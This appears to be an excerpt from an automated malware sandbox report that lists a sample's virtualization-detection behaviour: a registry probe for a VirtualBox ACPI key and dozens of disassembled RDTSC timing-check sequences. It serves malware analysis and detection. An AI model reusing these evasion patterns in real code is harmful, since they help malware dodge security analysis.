Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 53E6E5 second address: 53E6EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 53D629 second address: 53D62D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 53DA71 second address: 53DA86 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FA4C9084156h 0x00000008 je 00007FA4C9084156h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 53DA86 second address: 53DA8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 53DA8B second address: 53DA9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FA4C9084156h 0x0000000a jnp 00007FA4C9084156h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 53DF66 second address: 53DF8B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C902634Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FA4C9026355h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 53DF8B second address: 53DF8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 540A32 second address: 540A36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 540B10 second address: 540B26 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9084162h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 540B26 second address: 540B45 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007FA4C9026352h 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 540B45 second address: 540B74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 nop 0x00000007 stc 0x00000008 push 00000000h 0x0000000a add edi, dword ptr [ebp+122D378Eh] 0x00000010 push 0AEF717Dh 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FA4C9084168h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 540B74 second address: 540B84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA4C902634Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 540C81 second address: 540CF3 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA4C9084156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FA4C9084161h 0x0000000f popad 0x00000010 add dword ptr [esp], 17A97FB0h 0x00000017 call 00007FA4C908415Dh 0x0000001c mov edx, dword ptr [ebp+122D38EEh] 0x00000022 pop edi 0x00000023 push 00000003h 0x00000025 jnl 00007FA4C908415Ch 0x0000002b push 00000000h 0x0000002d jmp 00007FA4C9084167h 0x00000032 push 00000003h 0x00000034 mov di, dx 0x00000037 push A688C40Bh 0x0000003c push eax 0x0000003d push edx 0x0000003e jp 00007FA4C908415Ch 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 540CF3 second address: 540CF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 540CF7 second address: 540CFC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 540CFC second address: 540D1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 add dword ptr [esp], 19773BF5h 0x0000000e lea ebx, dword ptr [ebp+12456872h] 0x00000014 sub dword ptr [ebp+122D2FAFh], ebx 0x0000001a xchg eax, ebx 0x0000001b push edi 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 540D1C second address: 540D3D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9084165h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 540D3D second address: 540D41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 540D41 second address: 540D47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 56313D second address: 563156 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA4C9026353h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 524A40 second address: 524A44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5613E4 second address: 5613FE instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA4C902635Ch 0x00000008 jmp 00007FA4C9026350h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5617A1 second address: 5617AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jns 00007FA4C9084156h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5617AD second address: 5617C1 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FA4C9026346h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007FA4C9026346h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 561ABD second address: 561AC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 561AC1 second address: 561AC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 561AC7 second address: 561AD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 561AD0 second address: 561AD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 561C58 second address: 561C5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 561C5C second address: 561C6F instructions: 0x00000000 rdtsc 0x00000002 jp 00007FA4C9026346h 0x00000008 jg 00007FA4C9026346h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 561D90 second address: 561DAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA4C908415Ch 0x00000009 js 00007FA4C9084156h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 561DAB second address: 561DAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 561DAF second address: 561DC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 je 00007FA4C9084191h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 561DC2 second address: 561DC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 561DC6 second address: 561DCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 561DCA second address: 561DD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 561DD6 second address: 561DDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 561DDA second address: 561DF1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9026353h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 562092 second address: 562096 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 562096 second address: 5620B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9026351h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5620B1 second address: 5620D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007FA4C9084156h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push edi 0x0000000e pop edi 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007FA4C908415Dh 0x00000016 jnp 00007FA4C9084156h 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5620D6 second address: 5620DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5623C1 second address: 5623CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FA4C9084156h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5623CB second address: 5623E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9026355h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5623E4 second address: 562408 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA4C908415Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d jg 00007FA4C9084158h 0x00000013 push esi 0x00000014 pop esi 0x00000015 jc 00007FA4C908415Eh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 562408 second address: 56240E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 562D5E second address: 562D64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 562D64 second address: 562D68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 562D68 second address: 562D6E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 56C000 second address: 56C00D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 js 00007FA4C9026348h 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 56C00D second address: 56C012 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 56C012 second address: 56C025 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FA4C9026346h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 56C025 second address: 56C02B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 56C02B second address: 56C046 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9026354h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 56C046 second address: 56C04E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 56C04E second address: 56C055 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 570647 second address: 57064D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 57064D second address: 570651 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 57091F second address: 570923 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 570923 second address: 570929 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 570ABD second address: 570AC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 570AC1 second address: 570ACB instructions: 0x00000000 rdtsc 0x00000002 je 00007FA4C9026346h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 571467 second address: 57146D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 57146D second address: 571471 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 571471 second address: 571495 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9084168h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5716DB second address: 5716DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5718D1 second address: 5718D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 571FD3 second address: 571FFF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9026351h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c jmp 00007FA4C9026352h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 571FFF second address: 572008 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 572526 second address: 57252C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 57252C second address: 572530 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 57359F second address: 5735A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5735A5 second address: 5735B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007FA4C9084156h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5735B2 second address: 5735B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 574755 second address: 57475A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 57475A second address: 5747F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FA4C902634Eh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push esi 0x0000000f pushad 0x00000010 jmp 00007FA4C9026359h 0x00000015 jmp 00007FA4C9026351h 0x0000001a popad 0x0000001b pop esi 0x0000001c nop 0x0000001d jo 00007FA4C902635Eh 0x00000023 jmp 00007FA4C9026358h 0x00000028 push 00000000h 0x0000002a mov edi, dword ptr [ebp+122D38CEh] 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push edx 0x00000035 call 00007FA4C9026348h 0x0000003a pop edx 0x0000003b mov dword ptr [esp+04h], edx 0x0000003f add dword ptr [esp+04h], 00000017h 0x00000047 inc edx 0x00000048 push edx 0x00000049 ret 0x0000004a pop edx 0x0000004b ret 0x0000004c movzx esi, ax 0x0000004f push eax 0x00000050 jbe 00007FA4C9026358h 0x00000056 push eax 0x00000057 push edx 0x00000058 jno 00007FA4C9026346h 0x0000005e rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5747F9 second address: 5747FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 57683F second address: 576866 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA4C902634Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007FA4C9026352h 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5772E5 second address: 5772E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 57DAD3 second address: 57DAD9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 57EB11 second address: 57EB24 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C908415Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 57F8B5 second address: 57F8B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 57EB24 second address: 57EB29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 57F8B9 second address: 57F94C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 pop esi 0x0000000a popad 0x0000000b nop 0x0000000c mov bh, 8Ah 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push esi 0x00000013 call 00007FA4C9026348h 0x00000018 pop esi 0x00000019 mov dword ptr [esp+04h], esi 0x0000001d add dword ptr [esp+04h], 0000001Ch 0x00000025 inc esi 0x00000026 push esi 0x00000027 ret 0x00000028 pop esi 0x00000029 ret 0x0000002a and ebx, dword ptr [ebp+122D1968h] 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push edx 0x00000035 call 00007FA4C9026348h 0x0000003a pop edx 0x0000003b mov dword ptr [esp+04h], edx 0x0000003f add dword ptr [esp+04h], 0000001Bh 0x00000047 inc edx 0x00000048 push edx 0x00000049 ret 0x0000004a pop edx 0x0000004b ret 0x0000004c mov dword ptr [ebp+122D29E2h], edx 0x00000052 push eax 0x00000053 pushad 0x00000054 jmp 00007FA4C9026358h 0x00000059 push eax 0x0000005a push edx 0x0000005b jmp 00007FA4C9026352h 0x00000060 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 57FBA4 second address: 57FBA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5846C7 second address: 5846CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 583867 second address: 583871 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA4C9084156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 5846CD second address: 5846D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe	RDTSC instruction interceptor: First address: 583871 second address: 583876 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
